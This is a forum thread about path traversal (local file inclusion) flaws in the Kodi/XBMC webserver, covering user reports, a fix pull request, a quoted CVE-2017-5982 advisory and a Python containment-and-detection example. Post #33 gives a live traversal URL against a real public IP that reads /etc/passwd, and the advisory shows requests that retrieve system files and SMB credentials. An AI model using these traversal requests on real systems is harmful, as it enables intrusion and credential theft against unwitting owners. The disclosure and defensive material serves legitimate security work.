Security issues in XBMC
#31
@natethomas

Not at all, that's only one paragraph which loses context if the whole post is not taken into consideration. And the whole post is an observation and not any criticism, personal or otherwise; if that's what you took from it, I must not have made it clear.

I agree that people should be informed, and that was the point of why I wrote:

Quote: Recently XBMC added a display screen on first run (https://github.com/xbmc/xbmc/pull/1617) to tell users that there's a hidden menu. (A great usability idea.) Fantastic!
It would be great to use this idea to at least warn users that they are using default or weak usernames and passwords on the webserver and that it's a security issue. If users still choose to ignore it, then at least no one can say Team XBMC is not being responsible.

Any 3rd-party distros should equally demonstrate that by warning users in a similar fashion, and should not wait for XBMC to do it anyway.

Again, it's not a criticism, just an observation and a suggestion.

I believe Team XBMC developers do a fantastic job, and XBMC is a testament to their hard work, commitment and ingenuity.

I can't explain what I meant to say any better; English is not my first language.

Please don't be offended :(

uNi

#32
(image) http://i.imgur.com/WbrWHBy.png
#33
FYI guys,

I did find some older articles addressing the same issue (e.g. http://forum.kodi.tv/showthread.php?tid=...id=1231710), but that thread says it should be fixed? This also does not match "As of XBMC v12 Frodo, in an effort to make the Virtual File System service more secure (in Eden and before it allowed access to literally any file on the local hard disc and on network shares accessible to Kodi) the access has been limited to files within directories that have been specified by the user as sources (video, music, files, programs) in Kodi." (http://kodi.wiki/view/Webserver), as I'm running v15 ...

Please be aware, there are still plenty of users who appear to run the Kodi-interface publicly.

This Shodan query https://www.shodan.io/search?query=title%3Akodi found 5,184 results.

Not all of them may be vulnerable, but some are: http://178.85.220.75//%2f..%2f..%2f..%2f...c%2fpasswd

(I also found users running kodi as root, meaning even /etc/shadow could be read!)

Is this issue confirmed? Fixed?
#34
Edit: threads merged.

I've tested with current master and can confirm.
Do not PM or e-mail Team-Kodi members directly asking for support.
Always read the Forum rules, Kodi online-manual, FAQ, Help and Search the forum before posting.
#35
OK

A friend of mine found the original fix: https://github.com/xbmc/xbmc/commit/bdff...ab52a65335

and this commit, which may have reintroduced the issue (untested): https://github.com/xbmc/xbmc/commit/1291...f9e60bee66
#36
Good catch - seems the fix is missing in the newly introduced ResolveAddon method.
AppleTV4/iPhone/iPod/iPad: HowTo find debug logs and everything else which the devs like so much: click here
HowTo setup NFS for Kodi: NFS (wiki)
HowTo configure avahi (zeroconf): Avahi_Zeroconf (wiki)
READ THE IOS FAQ!: iOS FAQ (wiki)
#37
@ChessSpider please give this a shot if you don't mind:

https://github.com/xbmc/xbmc/pull/8446
#38
Good that it has been looked at so quickly :)

How does Kodi usually deal with security issues? Is there some kind of credit in the release notes? And will you release a new Kodi v15 with this fixed?

Thanks,
#39
Can you confirm the fix? There is nothing like credits but what we have on GitHub (you are explicitly mentioned in that pull request). 15.x is closed and there won't be any other 15.x release.
#40
I don't really have the set-up now to test this easily.

What I did was run nikto on the webserver :) (But you can also just copy/paste it and test it yourself.)

Please let me know if it's required for me to set something up.
#41
Nah, I already verified and just wanted a second "ack" ;). As the maintainer also gave his OK already, the fix will be active in the next nightly build.
#42
FYI, another LFI problem was posted on the Full Disclosure security list by Eric Flokstra a few days ago.

Original report:

Quote:
# Exploit Title: Kodi - Local File Inclusion
# Date: 12 February 2017
# Exploit Author: Eric Flokstra
# Vendor Homepage: https://kodi.tv/
# Software Link: https://kodi.tv/download/
# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2
# Tested on: Linux
# CVE: CVE-2017-5982

Kodi (formerly XBMC) is a free and open-source media player software
application developed by the XBMC Foundation. Chorus is a web interface
for controlling and interacting with Kodi. It is hosted by the Kodi
installation.

The web interface loads a thumbnail of an image, video or add-on when
selecting a category in the left menu with the following request:

http://192.168.1.25:8080/image/image%3A%...con.png%2F

Insufficient validation of user input is performed on this URL resulting
in a local file inclusion vulnerability. This enables attackers
to retrieve arbitrary files from the filesystem by changing the location
after the '/image/image%3A%2F%2F' part.

<--Examples-->

1) If Kodi is connected to a NAS the following request can be used to
obtain plain-text SMB credentials:

http://192.168.1.25:8080/image/image%3A%...swords.xml

Response:

<passwords><path><from pathversion="1">smb://192.168.1.15/</from><to
pathversion="1">smb://username:[email protected]//share</to></path></passwords>

2) Request to retrieve the content of /etc/passwd:

http://192.168.1.25:8080/image/image%3A%...252fpasswd

Response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...


--
---------------------------------------------------------------------
PGP Key ID = 0x6D336541EAB627EE
Fingerprint = DFBB E38E D848 4658 EC4C D161 6D33 6541 EAB6 27EE
https://pgp.mit.edu/pks/lookup?search=er...m&op=index
---------------------------------------------------------------------


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
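Both the `//%2f..%2f` traversal in #33 and the `image://` LFI quoted above come down to a file-serving handler trusting a percent-encoded path. Added Python example (not Kodi's code) of the containment check such a handler needs, plus the matching detection over constructed access-log lines; the source directories and log lines are constructed, and only local-filesystem sources are modelled.

```python
"""Containment check for a file-serving endpoint (added example, not Kodi's code).
Models what an /image/<encoded image:// url> handler must do so an encoded
traversal cannot escape the configured sources. Local-filesystem sources only."""
import os
import re
from urllib.parse import unquote

SOURCES = ["/srv/media/videos", "/srv/media/music"]  # constructed source dirs

# Constructed access-log lines: one legitimate thumbnail, one traversal attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /image/image%3A%2F%2F%2Fsrv%2Fmedia%2Fvideos%2Fcover.png%2F HTTP/1.1" 200',
    '10.0.0.9 - - "GET /image/image%3A%2F%2F%2F..%252f..%252f..%252fetc%252fpasswd%2F HTTP/1.1" 200',
]

def fully_decode(value: str, max_rounds: int = 4) -> str:
    """Percent-decode until stable: the report's request used %252f, a
    double-encoded '/', which a single unquote() pass leaves intact."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")

def resolve_within_sources(encoded_url: str, sources=SOURCES):
    """Real path for an image://<path>/ request, or None if it leaves every source."""
    decoded = fully_decode(encoded_url)
    if not decoded.startswith("image://") or "\x00" in decoded:
        return None
    target = decoded[len("image://"):].rstrip("/")
    # realpath collapses '..' and follows symlinks, so the containment test
    # runs on the path that would actually be opened, not the one as typed.
    candidate = os.path.realpath(target)
    for root in sources:
        real_root = os.path.realpath(root)
        if os.path.commonpath([real_root, candidate]) == real_root:
            return candidate
    return None

def flag_traversal_requests(access_log=SAMPLE_LOG) -> list:
    """Detection side: request paths of /image/ hits that escaped the sources."""
    flagged = []
    for line in access_log:
        m = re.search(r'"GET /image/(\S+) HTTP', line)
        if m and resolve_within_sources(m.group(1)) is None:
            flagged.append(m.group(1))
    return flagged
```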
#43
So what else is new?
Read/follow the forum rules.
For troubleshooting and bug reporting, read this first
Interested in seeing some YouTube videos about Kodi? Go here and subscribe
#44
(2017-02-16, 17:26) Martijn wrote: So what else is new?

IKR, another year, another LFI for Kodi.
#45
Here's the code: https://github.com/xbmc/xbmc

Patches welcome.